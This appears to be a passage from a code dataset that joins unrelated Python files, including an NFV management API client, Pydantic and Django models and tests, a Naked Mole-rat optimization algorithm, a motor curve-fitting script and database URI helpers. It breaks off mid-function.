return [VimInfo(vim) for vim in data] if error is None else [], error
def GetVimLocationImages(self, user: User, vim_name: str) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/image', f"images for VIM '{vim_name}'") # type: Dict, Optional[str]
return data.get(vim_name, []) if error is None else [], error
def GetAvailableVnfds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/vnfd', f"VNFDs") # type: Dict, Optional[str]
return data if error is None else [], error
def GetAvailableNsds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/nsd', f"NSDs") # type: Dict, Optional[str]
return data if error is None else [], error
def handleErrorcodes(self, code: int, data: Dict, overrides: Dict[int, str] = None) -> str:
defaults = {
400: "Invalid Input",
401: "Invalid permission",
404: "Not found",
406: "File not valid",
409: "Conflict",
413: "File too large",
422: "Unprocessable entity",
500: "Internal server error" # Or an unknown error code
}
overrides = {} if overrides is None else overrides
error = overrides.get(code, defaults.get(code, defaults[500]))
if code in [400, 404, 409, 422]:
extra = f" (Status: {data['status']}, Code: {data['code']}, Detail: {data['detail']})"
elif code == 401:
extra = ""
else:
extra = f" (Code {code})"
return error + extra
def OnboardVnfd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/vnfd'
overrides = {409: "Conflict - VNFD already present"}
return self._onboardVnfdOrNsd(url, path, token, 'VNFs', overrides, visibility)
def OnboardNsd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/nsd'
overrides = {409: "Conflict - NSD already present"}
return self._onboardVnfdOrNsd(url, path, token, "NSs", overrides, visibility)
def _onboardVnfdOrNsd(self, url: str, path: str, token: str, dictId: str, overrides: Dict, visibility: bool):
with open(path, "br") as file:
data = {'visibility': str(visibility).lower()}
response = self.HttpPost(url, extra_headers=self.bearerAuthHeader(token), files={'file': file},
body=data, payload=Payload.Form)
code = self.ResponseStatusCode(response)
data = self.ResponseToJson(response)
if code == 200:
try:
return list(data[dictId].keys())[0], True
except (KeyError, IndexError, AttributeError):
return split(path)[1], True
elif code == 400:
try:
return data['error'], False
except KeyError:
return str(data), False
else:
return self.handleErrorcodes(code, data, overrides), False
def OnboardVim(self, path: str, vimName: str, token: str, visibility: str) -> Optional[str]:
"""Returns an error message, or None on success"""
with open(path, "br") as file:
containerFormat = "bare"
data = {'vim_id': vimName, 'container_format': containerFormat,
'visibility': str(visibility).lower()}
response = self.HttpPost('/mano/image', extra_headers=self.bearerAuthHeader(token),
body=data, files={'file': file}, payload=Payload.Form)
code = self.ResponseStatusCode(response)
if 200 <= code <= 299:
return None
else:
try:
data = self.ResponseToJson(response)
return data.get('detail', data.get('result', f'Unknown error. Status code: {code}'))
except Exception as e:
raise Exception(f"Unknown exception '{e}'. Status code: {code}") | en | 0.374407 | Returns (<message>, <success>). Return a tuple (str, bool). The string contains the token OR the error message, the boolean indicates success. Returns None if no error, an error message otherwise Returns None if no error, an error message otherwise # type: List, Optional[str] # type: Dict, Optional[str] # type: Dict, Optional[str] # type: Dict, Optional[str] # Or an unknown error code Returns a pair of str (id or error message) and bool (success) Returns a pair of str (id or error message) and bool (success) Returns an error message, or None on success | 2.523205 | 3 |
ultron8/api/models/guid.py | bossjones/ultron8 | 0 | 6616708 | <filename>ultron8/api/models/guid.py
"""Pydantic serializers for managing (de)serializationand doc generation."""
from datetime import datetime, timedelta, timezone
import logging
from typing import Union
from pydantic import BaseModel, validator
from ultron8.api.models.base import BaseDataModel
# pylint: disable=no-self-argument
log = logging.getLogger(__name__)
# Properties to receive on item creation
class GuidCreate(BaseDataModel):
name: str
class GuidIn(BaseDataModel):
"""
Serializer for creating a record.
Formats data, so that it'll play nicely w/ the DB.
Also, sets defaults for `expire`.
"""
expire: datetime = None
name: str
@validator("expire", pre=True, always=True)
def set_expire(cls, v):
"""Set expire time as 30 days from now, if not specified."""
if v is None:
return datetime.now(timezone.utc) + timedelta(days=30)
return v
@validator("expire", always=True)
def set_tz(cls, v):
"""After initial validation logic, add utc as the timezone."""
return v.replace(tzinfo=timezone.utc)
class GuidUpdate(BaseDataModel):
"""
Serializer for updating a record.
Formats data, so that it'll play nicely w/ the DB.
"""
expire: datetime = None
name: str = None
class GuidOut(BaseDataModel):
"""Serialize output, that'll be sent to the end user properly."""
id: str
expire: datetime
name: str
@validator("expire")
def check_expire(cls, v: Union[datetime, str]) -> str:
"""Coerce expire into being Unix Time."""
if type(v) == str:
v = datetime.fromisoformat(v)
return str(int(v.replace(tzinfo=timezone.utc).timestamp()))
| <filename>ultron8/api/models/guid.py
"""Pydantic serializers for managing (de)serializationand doc generation."""
from datetime import datetime, timedelta, timezone
import logging
from typing import Union
from pydantic import BaseModel, validator
from ultron8.api.models.base import BaseDataModel
# pylint: disable=no-self-argument
log = logging.getLogger(__name__)
# Properties to receive on item creation
class GuidCreate(BaseDataModel):
name: str
class GuidIn(BaseDataModel):
"""
Serializer for creating a record.
Formats data, so that it'll play nicely w/ the DB.
Also, sets defaults for `expire`.
"""
expire: datetime = None
name: str
@validator("expire", pre=True, always=True)
def set_expire(cls, v):
"""Set expire time as 30 days from now, if not specified."""
if v is None:
return datetime.now(timezone.utc) + timedelta(days=30)
return v
@validator("expire", always=True)
def set_tz(cls, v):
"""After initial validation logic, add utc as the timezone."""
return v.replace(tzinfo=timezone.utc)
class GuidUpdate(BaseDataModel):
"""
Serializer for updating a record.
Formats data, so that it'll play nicely w/ the DB.
"""
expire: datetime = None
name: str = None
class GuidOut(BaseDataModel):
"""Serialize output, that'll be sent to the end user properly."""
id: str
expire: datetime
name: str
@validator("expire")
def check_expire(cls, v: Union[datetime, str]) -> str:
"""Coerce expire into being Unix Time."""
if type(v) == str:
v = datetime.fromisoformat(v)
return str(int(v.replace(tzinfo=timezone.utc).timestamp()))
| en | 0.873957 | Pydantic serializers for managing (de)serializationand doc generation. # pylint: disable=no-self-argument # Properties to receive on item creation Serializer for creating a record. Formats data, so that it'll play nicely w/ the DB. Also, sets defaults for `expire`. Set expire time as 30 days from now, if not specified. After initial validation logic, add utc as the timezone. Serializer for updating a record. Formats data, so that it'll play nicely w/ the DB. Serialize output, that'll be sent to the end user properly. Coerce expire into being Unix Time. | 2.513733 | 3 |
app/admin/tests/tests_models.py | zollf/CITS3200 | 0 | 6616709 | from faker.factory import Factory
from factory.django import DjangoModelFactory
from django.test import TestCase
from ..models import Settings
from assertpy import assert_that
faker = Factory.create()
class SettingsFactory(DjangoModelFactory):
key = faker.word()
label = faker.word()
value = faker.phone_number()
type = 'text'
class Meta:
model = Settings
class SettingsModelTest(TestCase):
def setUp(self):
"""Create a new fake key"""
self.fake_key = faker.word()
self.fake_setting = SettingsFactory(key=self.fake_key)
def test_getKeys(self):
"""Should return new fake key"""
assert_that(Settings.getKeys()).contains(self.fake_key)
def test_getDict(self):
"""Should return settings dictionary"""
settings = Settings.getDict()
self.assertEqual(settings[self.fake_key], self.fake_setting.value)
def test_settings(self):
"Settings Model"
setting = SettingsFactory()
self.assertEqual(setting.key, Settings.objects.get(pk=setting.id).key)
setting.delete()
with self.assertRaises(Settings.DoesNotExist):
Settings.objects.get(pk=setting.id)
| from faker.factory import Factory
from factory.django import DjangoModelFactory
from django.test import TestCase
from ..models import Settings
from assertpy import assert_that
faker = Factory.create()
class SettingsFactory(DjangoModelFactory):
key = faker.word()
label = faker.word()
value = faker.phone_number()
type = 'text'
class Meta:
model = Settings
class SettingsModelTest(TestCase):
def setUp(self):
"""Create a new fake key"""
self.fake_key = faker.word()
self.fake_setting = SettingsFactory(key=self.fake_key)
def test_getKeys(self):
"""Should return new fake key"""
assert_that(Settings.getKeys()).contains(self.fake_key)
def test_getDict(self):
"""Should return settings dictionary"""
settings = Settings.getDict()
self.assertEqual(settings[self.fake_key], self.fake_setting.value)
def test_settings(self):
"Settings Model"
setting = SettingsFactory()
self.assertEqual(setting.key, Settings.objects.get(pk=setting.id).key)
setting.delete()
with self.assertRaises(Settings.DoesNotExist):
Settings.objects.get(pk=setting.id)
| en | 0.413187 | Create a new fake key Should return new fake key Should return settings dictionary | 2.616485 | 3 |
src/benchmarkstt/metrics/__init__.py | ioannisNoukakis/benchmarkstt | 1 | 6616710 | from benchmarkstt.schema import Schema
from benchmarkstt.factory import Factory
class Base:
"""
Base class for metrics
"""
def compare(self, ref: Schema, hyp: Schema):
raise NotImplementedError()
factory = Factory(Base)
| from benchmarkstt.schema import Schema
from benchmarkstt.factory import Factory
class Base:
"""
Base class for metrics
"""
def compare(self, ref: Schema, hyp: Schema):
raise NotImplementedError()
factory = Factory(Base)
| en | 0.725228 | Base class for metrics | 2.314251 | 2 |
mealpy/swarm_based/NMRA.py | lamto20132223/mealpy | 2 | 6616711 | <reponame>lamto20132223/mealpy
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "<NAME>" at 14:52, 17/03/2020 %
# %
# Email: <EMAIL> %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieunguyen5991 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, choice, normal, randint
from numpy import power, sin, pi, abs, zeros, sqrt, sign
from math import gamma
from copy import deepcopy
from mealpy.root import Root
class BaseNMR(Root):
"""
The original version of: Naked Mole-rat Algorithm (NMRA)
(The naked mole-rat algorithm)
Link:
https://www.doi.org10.1007/s00521-019-04464-7
"""
def __init__(self, root_paras=None, epoch=750, pop_size=100, bp=0.75):
Root.__init__(self, root_paras)
self.epoch = epoch
self.pop_size = pop_size
self.size_b = int(self.pop_size / 5)
self.size_w = self.pop_size - self.size_b
self.bp = bp # breeding probability (0.75)
def _train__(self):
pop = [self._create_solution__(minmax=0) for _ in range(self.pop_size)]
pop, g_best = self._sort_pop_and_get_global_best__(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
for i in range(self.pop_size):
temp = deepcopy(pop[i][self.ID_POS])
if i < self.size_b: # breeding operators
if uniform() < self.bp:
alpha = uniform()
temp = (1 - alpha) * pop[i][self.ID_POS] + alpha * (g_best[self.ID_POS] - pop[i][self.ID_POS])
else: # working operators
t1, t2 = choice(range(self.size_b, self.pop_size), 2, replace=False)
temp = pop[i][self.ID_POS] + uniform() * (pop[t1][self.ID_POS] - pop[t2][self.ID_POS])
fit = self._fitness_model__(temp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [temp, fit]
pop, g_best = self._sort_pop_and_update_global_best__(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.print_train:
print("> Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyNMR(BaseNMR):
"""
My speedup version of: Naked Mole-rat Algorithm (NMRA)
(The naked mole-rat algorithm)
"""
def __init__(self, root_paras=None, epoch=750, pop_size=100, bp=0.75):
BaseNMR.__init__(self, root_paras, epoch, pop_size, bp)
self.pm = 0.025
def _levy_flight__(self, epoch, solution, prey):
beta = 1
# muy and v are two random variables which follow normal distribution
# sigma_muy : standard deviation of muy
sigma_muy = power(gamma(1 + beta) * sin(pi * beta / 2) / (gamma((1 + beta) / 2) * beta * power(2, (beta - 1) / 2)),1 / beta)
# sigma_v : standard deviation of v
sigma_v = 1
muy = normal(0, sigma_muy**2)
v = normal(0, sigma_v**2)
s = muy / power(abs(v), 1 / beta)
# D is a random solution
D = self._create_solution__(minmax=self.ID_MIN_PROB)
LB = 0.001 * s * (solution[self.ID_POS] - prey[self.ID_POS])
levy = D[self.ID_POS] * LB
return levy
# x_new = solution[0] + 1.0/sqrt(epoch+1) * sign(uniform() - 0.5) * levy
# return x_new
def _crossover__(self, solution, g_best):
start_point = randint(0, self.problem_size / 2)
id1 = start_point
id2 = int(start_point + self.problem_size / 3)
id3 = int(self.problem_size)
new_temp = deepcopy(solution[self.ID_POS])
new_temp[0:id1] = g_best[self.ID_POS][0:id1]
new_temp[id1:id2] = solution[self.ID_POS][id1:id2]
new_temp[id2:id3] = g_best[self.ID_POS][id2:id3]
return new_temp
def _crossover_random__(self, pop, g_best):
start_point = randint(0, self.problem_size / 2)
id1 = start_point
id2 = int(start_point + self.problem_size / 3)
id3 = int(self.problem_size)
partner = pop[randint(0, self.pop_size)][self.ID_POS]
new_temp = zeros(self.problem_size)
new_temp[0:id1] = g_best[self.ID_POS][0:id1]
new_temp[id1:id2] = partner[id1:id2]
new_temp[id2:id3] = g_best[self.ID_POS][id2:id3]
return new_temp
### Mutation
def _mutation_flip_point__(self, parent, index):
w = deepcopy(parent)
w[index] = uniform(self.domain_range[0], self.domain_range[1])
return w
def _train__(self):
pop = [self._create_solution__(minmax=0) for _ in range(self.pop_size)]
pop, g_best = self._sort_pop_and_get_global_best__(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
for i in range(self.pop_size):
temp = deepcopy(pop[i][self.ID_POS])
# Exploration
if i < self.size_b: # breeding operators
if uniform() < self.bp:
alpha = uniform()
temp = pop[i][self.ID_POS] + alpha * (g_best[self.ID_POS] - pop[i][self.ID_POS])
else:
#temp = self._crossover__(pop[i], g_best)
temp = self._crossover_random__(pop, g_best)
# Exploitation
else: # working operators
if uniform() < 0.5:
t1, t2 = choice(range(self.size_b, self.pop_size), 2, replace=False)
temp = pop[i][self.ID_POS] + uniform() * (pop[t1][self.ID_POS] - pop[t2][self.ID_POS])
else:
temp = self._levy_flight__(epoch, pop[i], g_best)
# Mutation
for id in range(0, self.problem_size):
if uniform() < self.pm:
temp = self._mutation_flip_point__(temp, id)
#temp = self._random_amend_solution_and_return__(temp)
fit = self._fitness_model__(temp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [temp, fit]
# xichma = power((gamma(1 + 1.5) * sin(pi * 1.5 / 2.0)) / (gamma((1 + 1.5) * 1.5 * power(2, (1.5 - 1) / 2)) / 2.0), 1.0 / 1.5)
# LF_D = 0.01 * uniform() * xichma / power(abs(uniform()), 1.0 / 1.5)
# J = 2 * (1 - uniform())
# w = 1 - (epoch + 1) * 1.0 / self.epoch
# Y = g_best[self.ID_POS] - w * abs(J * g_best[self.ID_POS] - pop[i][self.ID_POS])
# Z = Y + uniform(self.domain_range[0], self.domain_range[1], self.problem_size) * LF_D
#
# fit_Y = self._fitness_model__(Y)
# fit_Z = self._fitness_model__(Z)
# if fit_Y < pop[i][self.ID_FIT]:
# pop[i] = [Y, fit_Y]
# if fit_Z < pop[i][self.ID_FIT]:
# pop[i] = [Z, fit_Z]
pop, g_best = self._sort_pop_and_update_global_best__(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.print_train:
print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| #!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "<NAME>" at 14:52, 17/03/2020 %
# %
# Email: <EMAIL> %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieunguyen5991 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, choice, normal, randint
from numpy import power, sin, pi, abs, zeros, sqrt, sign
from math import gamma
from copy import deepcopy
from mealpy.root import Root
class BaseNMR(Root):
"""
The original version of: Naked Mole-rat Algorithm (NMRA)
(The naked mole-rat algorithm)
Link:
https://www.doi.org10.1007/s00521-019-04464-7
"""
def __init__(self, root_paras=None, epoch=750, pop_size=100, bp=0.75):
Root.__init__(self, root_paras)
self.epoch = epoch
self.pop_size = pop_size
self.size_b = int(self.pop_size / 5)
self.size_w = self.pop_size - self.size_b
self.bp = bp # breeding probability (0.75)
def _train__(self):
pop = [self._create_solution__(minmax=0) for _ in range(self.pop_size)]
pop, g_best = self._sort_pop_and_get_global_best__(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
for i in range(self.pop_size):
temp = deepcopy(pop[i][self.ID_POS])
if i < self.size_b: # breeding operators
if uniform() < self.bp:
alpha = uniform()
temp = (1 - alpha) * pop[i][self.ID_POS] + alpha * (g_best[self.ID_POS] - pop[i][self.ID_POS])
else: # working operators
t1, t2 = choice(range(self.size_b, self.pop_size), 2, replace=False)
temp = pop[i][self.ID_POS] + uniform() * (pop[t1][self.ID_POS] - pop[t2][self.ID_POS])
fit = self._fitness_model__(temp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [temp, fit]
pop, g_best = self._sort_pop_and_update_global_best__(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.print_train:
print("> Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyNMR(BaseNMR):
"""
My speedup version of: Naked Mole-rat Algorithm (NMRA)
(The naked mole-rat algorithm)
"""
def __init__(self, root_paras=None, epoch=750, pop_size=100, bp=0.75):
BaseNMR.__init__(self, root_paras, epoch, pop_size, bp)
self.pm = 0.025
def _levy_flight__(self, epoch, solution, prey):
beta = 1
# muy and v are two random variables which follow normal distribution
# sigma_muy : standard deviation of muy
sigma_muy = power(gamma(1 + beta) * sin(pi * beta / 2) / (gamma((1 + beta) / 2) * beta * power(2, (beta - 1) / 2)),1 / beta)
# sigma_v : standard deviation of v
sigma_v = 1
muy = normal(0, sigma_muy**2)
v = normal(0, sigma_v**2)
s = muy / power(abs(v), 1 / beta)
# D is a random solution
D = self._create_solution__(minmax=self.ID_MIN_PROB)
LB = 0.001 * s * (solution[self.ID_POS] - prey[self.ID_POS])
levy = D[self.ID_POS] * LB
return levy
# x_new = solution[0] + 1.0/sqrt(epoch+1) * sign(uniform() - 0.5) * levy
# return x_new
def _crossover__(self, solution, g_best):
start_point = randint(0, self.problem_size / 2)
id1 = start_point
id2 = int(start_point + self.problem_size / 3)
id3 = int(self.problem_size)
new_temp = deepcopy(solution[self.ID_POS])
new_temp[0:id1] = g_best[self.ID_POS][0:id1]
new_temp[id1:id2] = solution[self.ID_POS][id1:id2]
new_temp[id2:id3] = g_best[self.ID_POS][id2:id3]
return new_temp
def _crossover_random__(self, pop, g_best):
start_point = randint(0, self.problem_size / 2)
id1 = start_point
id2 = int(start_point + self.problem_size / 3)
id3 = int(self.problem_size)
partner = pop[randint(0, self.pop_size)][self.ID_POS]
new_temp = zeros(self.problem_size)
new_temp[0:id1] = g_best[self.ID_POS][0:id1]
new_temp[id1:id2] = partner[id1:id2]
new_temp[id2:id3] = g_best[self.ID_POS][id2:id3]
return new_temp
### Mutation
def _mutation_flip_point__(self, parent, index):
w = deepcopy(parent)
w[index] = uniform(self.domain_range[0], self.domain_range[1])
return w
def _train__(self):
pop = [self._create_solution__(minmax=0) for _ in range(self.pop_size)]
pop, g_best = self._sort_pop_and_get_global_best__(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
for i in range(self.pop_size):
temp = deepcopy(pop[i][self.ID_POS])
# Exploration
if i < self.size_b: # breeding operators
if uniform() < self.bp:
alpha = uniform()
temp = pop[i][self.ID_POS] + alpha * (g_best[self.ID_POS] - pop[i][self.ID_POS])
else:
#temp = self._crossover__(pop[i], g_best)
temp = self._crossover_random__(pop, g_best)
# Exploitation
else: # working operators
if uniform() < 0.5:
t1, t2 = choice(range(self.size_b, self.pop_size), 2, replace=False)
temp = pop[i][self.ID_POS] + uniform() * (pop[t1][self.ID_POS] - pop[t2][self.ID_POS])
else:
temp = self._levy_flight__(epoch, pop[i], g_best)
# Mutation
for id in range(0, self.problem_size):
if uniform() < self.pm:
temp = self._mutation_flip_point__(temp, id)
#temp = self._random_amend_solution_and_return__(temp)
fit = self._fitness_model__(temp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [temp, fit]
# xichma = power((gamma(1 + 1.5) * sin(pi * 1.5 / 2.0)) / (gamma((1 + 1.5) * 1.5 * power(2, (1.5 - 1) / 2)) / 2.0), 1.0 / 1.5)
# LF_D = 0.01 * uniform() * xichma / power(abs(uniform()), 1.0 / 1.5)
# J = 2 * (1 - uniform())
# w = 1 - (epoch + 1) * 1.0 / self.epoch
# Y = g_best[self.ID_POS] - w * abs(J * g_best[self.ID_POS] - pop[i][self.ID_POS])
# Z = Y + uniform(self.domain_range[0], self.domain_range[1], self.problem_size) * LF_D
#
# fit_Y = self._fitness_model__(Y)
# fit_Z = self._fitness_model__(Z)
# if fit_Y < pop[i][self.ID_FIT]:
# pop[i] = [Y, fit_Y]
# if fit_Z < pop[i][self.ID_FIT]:
# pop[i] = [Z, fit_Z]
pop, g_best = self._sort_pop_and_update_global_best__(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.print_train:
print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train | en | 0.4959 | #!/usr/bin/env python # ------------------------------------------------------------------------------------------------------% # Created by "<NAME>" at 14:52, 17/03/2020 % # % # Email: <EMAIL> % # Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 % # Github: https://github.com/thieunguyen5991 % #-------------------------------------------------------------------------------------------------------% The original version of: Naked Mole-rat Algorithm (NMRA) (The naked mole-rat algorithm) Link: https://www.doi.org10.1007/s00521-019-04464-7 # breeding probability (0.75) # breeding operators # working operators My speedup version of: Naked Mole-rat Algorithm (NMRA) (The naked mole-rat algorithm) # muy and v are two random variables which follow normal distribution # sigma_muy : standard deviation of muy # sigma_v : standard deviation of v # D is a random solution # x_new = solution[0] + 1.0/sqrt(epoch+1) * sign(uniform() - 0.5) * levy # return x_new ### Mutation # Exploration # breeding operators #temp = self._crossover__(pop[i], g_best) # Exploitation # working operators # Mutation #temp = self._random_amend_solution_and_return__(temp) # xichma = power((gamma(1 + 1.5) * sin(pi * 1.5 / 2.0)) / (gamma((1 + 1.5) * 1.5 * power(2, (1.5 - 1) / 2)) / 2.0), 1.0 / 1.5) # LF_D = 0.01 * uniform() * xichma / power(abs(uniform()), 1.0 / 1.5) # J = 2 * (1 - uniform()) # w = 1 - (epoch + 1) * 1.0 / self.epoch # Y = g_best[self.ID_POS] - w * abs(J * g_best[self.ID_POS] - pop[i][self.ID_POS]) # Z = Y + uniform(self.domain_range[0], self.domain_range[1], self.problem_size) * LF_D # # fit_Y = self._fitness_model__(Y) # fit_Z = self._fitness_model__(Z) # if fit_Y < pop[i][self.ID_FIT]: # pop[i] = [Y, fit_Y] # if fit_Z < pop[i][self.ID_FIT]: # pop[i] = [Z, fit_Z] | 2.536007 | 3 |
cases/migrations/0007_auto_20200313_1736.py | brokenloop/covidmapping-api | 1 | 6616712 | # Generated by Django 3.0.4 on 2020-03-13 21:36
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('cases', '0006_auto_20200312_2021'),
]
operations = [
migrations.AddField(
model_name='coronacaseraw',
name='date_received',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='coronacaseraw',
name='update_flag',
field=models.BooleanField(default=False),
),
]
| # Generated by Django 3.0.4 on 2020-03-13 21:36
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('cases', '0006_auto_20200312_2021'),
]
operations = [
migrations.AddField(
model_name='coronacaseraw',
name='date_received',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='coronacaseraw',
name='update_flag',
field=models.BooleanField(default=False),
),
]
| en | 0.734252 | # Generated by Django 3.0.4 on 2020-03-13 21:36 | 1.614188 | 2 |
dynaban/pypot/equation_find_trial_multi_motor.py | laukik-hase/imitation_of_human_arm_on_robotic_manipulator | 3 | 6616713 | <reponame>laukik-hase/imitation_of_human_arm_on_robotic_manipulator
import math
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import curve_fit
import csv
def func2(t, a, b, c, d):
return a*pow(t, 3) + b*pow(t, 2) + c*t + d
def read_file(inp):
data = []
cp = []
with open(inp, 'r') as file:
reader = csv.reader(file)
for row in reader:
data.append(list(map(int, row)))
res, t = [], []
k = 1
for element in data:
if element[0] <= k * 500:
t.append(element[1])
else:
k = k + 1
res.append(t)
t = []
t.append(element[1])
cp.append(element[0])
return res ,cp
# main Program
file_name1 = input('Enter csv file for motor 1: ')
angle1, timestamp1 = read_file(file_name1)
file_name2 = input('Enter csv file for motor 2: ')
angle2, timestamp2 = read_file(file_name2)
# file_name3 = input('Enter csv file for motor 3: ')
# angle3, timestamp3 = read_file(file_name3)
# file_name4 = input('Enter csv file for motor 4: ')
# angle4, timestamp4 = read_file(file_name4)
coeff1 = {}
pcov1 = {}
count1 = 0
for value in angle1:
coeff1[count1], pcov1[count1] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
print(coeff1[count1],count1)
count1 = count1 + 1
coeff2 = {}
pcov2 = {}
count2 = 0
for value in angle2:
coeff2[count2], pcov2[count2] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
print(coeff2[count2],count2)
count2 = count2 + 1
# coeff3 = {}
# pcov3 = {}
# count3 = 0
# for value in angle3:
# coeff3[count3], pcov3[count3] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
# print(coeff3[count3],count3)
# count3 = count3 + 1
# coeff4 = {}
# pcov4 = {}
# count4 = 0
# for value in angle4:
# coeff4[count4], pcov4[count4] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
# print(coeff4[count4],count4)
# count4 = count4 + 1 | import math
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import curve_fit
import csv
def func2(t, a, b, c, d):
return a*pow(t, 3) + b*pow(t, 2) + c*t + d
def read_file(inp):
data = []
cp = []
with open(inp, 'r') as file:
reader = csv.reader(file)
for row in reader:
data.append(list(map(int, row)))
res, t = [], []
k = 1
for element in data:
if element[0] <= k * 500:
t.append(element[1])
else:
k = k + 1
res.append(t)
t = []
t.append(element[1])
cp.append(element[0])
return res ,cp
# main Program
file_name1 = input('Enter csv file for motor 1: ')
angle1, timestamp1 = read_file(file_name1)
file_name2 = input('Enter csv file for motor 2: ')
angle2, timestamp2 = read_file(file_name2)
# file_name3 = input('Enter csv file for motor 3: ')
# angle3, timestamp3 = read_file(file_name3)
# file_name4 = input('Enter csv file for motor 4: ')
# angle4, timestamp4 = read_file(file_name4)
coeff1 = {}
pcov1 = {}
count1 = 0
for value in angle1:
coeff1[count1], pcov1[count1] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
print(coeff1[count1],count1)
count1 = count1 + 1
coeff2 = {}
pcov2 = {}
count2 = 0
for value in angle2:
coeff2[count2], pcov2[count2] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
print(coeff2[count2],count2)
count2 = count2 + 1
# coeff3 = {}
# pcov3 = {}
# count3 = 0
# for value in angle3:
# coeff3[count3], pcov3[count3] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
# print(coeff3[count3],count3)
# count3 = count3 + 1
# coeff4 = {}
# pcov4 = {}
# count4 = 0
# for value in angle4:
# coeff4[count4], pcov4[count4] = curve_fit(func2, np.linspace(0,0.5,len(value)),value)
# print(coeff4[count4],count4)
# count4 = count4 + 1 | en | 0.643016 | # main Program # file_name3 = input('Enter csv file for motor 3: ') # angle3, timestamp3 = read_file(file_name3) # file_name4 = input('Enter csv file for motor 4: ') # angle4, timestamp4 = read_file(file_name4) # coeff3 = {} # pcov3 = {} # count3 = 0 # for value in angle3: # coeff3[count3], pcov3[count3] = curve_fit(func2, np.linspace(0,0.5,len(value)),value) # print(coeff3[count3],count3) # count3 = count3 + 1 # coeff4 = {} # pcov4 = {} # count4 = 0 # for value in angle4: # coeff4[count4], pcov4[count4] = curve_fit(func2, np.linspace(0,0.5,len(value)),value) # print(coeff4[count4],count4) # count4 = count4 + 1 | 3.06199 | 3 |
dbbase/utils.py | sidorof/dbbase | 0 | 6616714 | # dbbase/utils.py
"""
This module implements some utilities.
"""
import string
import json
import logging
logger = logging.getLogger(__file__)
def db_config(base, config_vars=None):
"""
This function combines config variables with a base string.
It is a convenience function for combining data elements
to make a string that represents a database URI.
Default:
db_config(base, config_vars=None)
Args:
base: (str) : a string that is the db template, such as
`"postgresql://{user}:{pass}@{host}:{port}/{dbname}"`
config_vars: (dict) : variables that will be combined with the base.
For example:
'user': 'auser',
'pass': '<PASSWORD>',
'host': 'localhost',
'port': 5432,
'dbname': 'mydatadb'
config_vars can also be a string that successfully converts from JSON
to a dict.
This enables a config to be as simplistic or complex as the situation
warrants.
Returns:
completed_URI (str) : the database URI
"""
if config_vars is None:
config_vars = {}
if isinstance(config_vars, str):
# try to convert from json
config_vars = json.loads(config_vars)
if isinstance(config_vars, dict):
return base.format(**config_vars)
return base
def _is_sqlite(config):
"""_is_sqlite
Default:
_is_sqlite(config)
returns True if config contains the string sqlite
returns True if config contains :memory:
"""
if config.find("sqlite") > -1:
return True
if config.find(":memory:") > -1:
return True
return False
def xlate(key, camel_case=True):
"""
This function translates a name to camel case or back.
Default:
xlate(key, camel_case=True)
Example:
camel_case is True:
start_date would become startDate
startdate would remain startdate
camel_case is False:
startDate would become start_date
startdate would remain startdate
Args:
key: (str) : the key that would be converted
camel_case: (bool) : True to convert to camel case
Returns:
key (str) : the converted string
"""
if camel_case:
return _xlate_camel_case(key)
return _xlate_from_camel_case(key)
def _xlate_camel_case(key):
"""Convert example: start_date -> startDate """
if key.find("_") > -1:
key = string.capwords(key.replace("_", " ")).replace(" ", "")
key = key[0].lower() + key[1:]
return key
def _xlate_from_camel_case(key):
"""Convert example: startDate -> start_date """
new_key = ""
for char in key:
if char in string.ascii_uppercase:
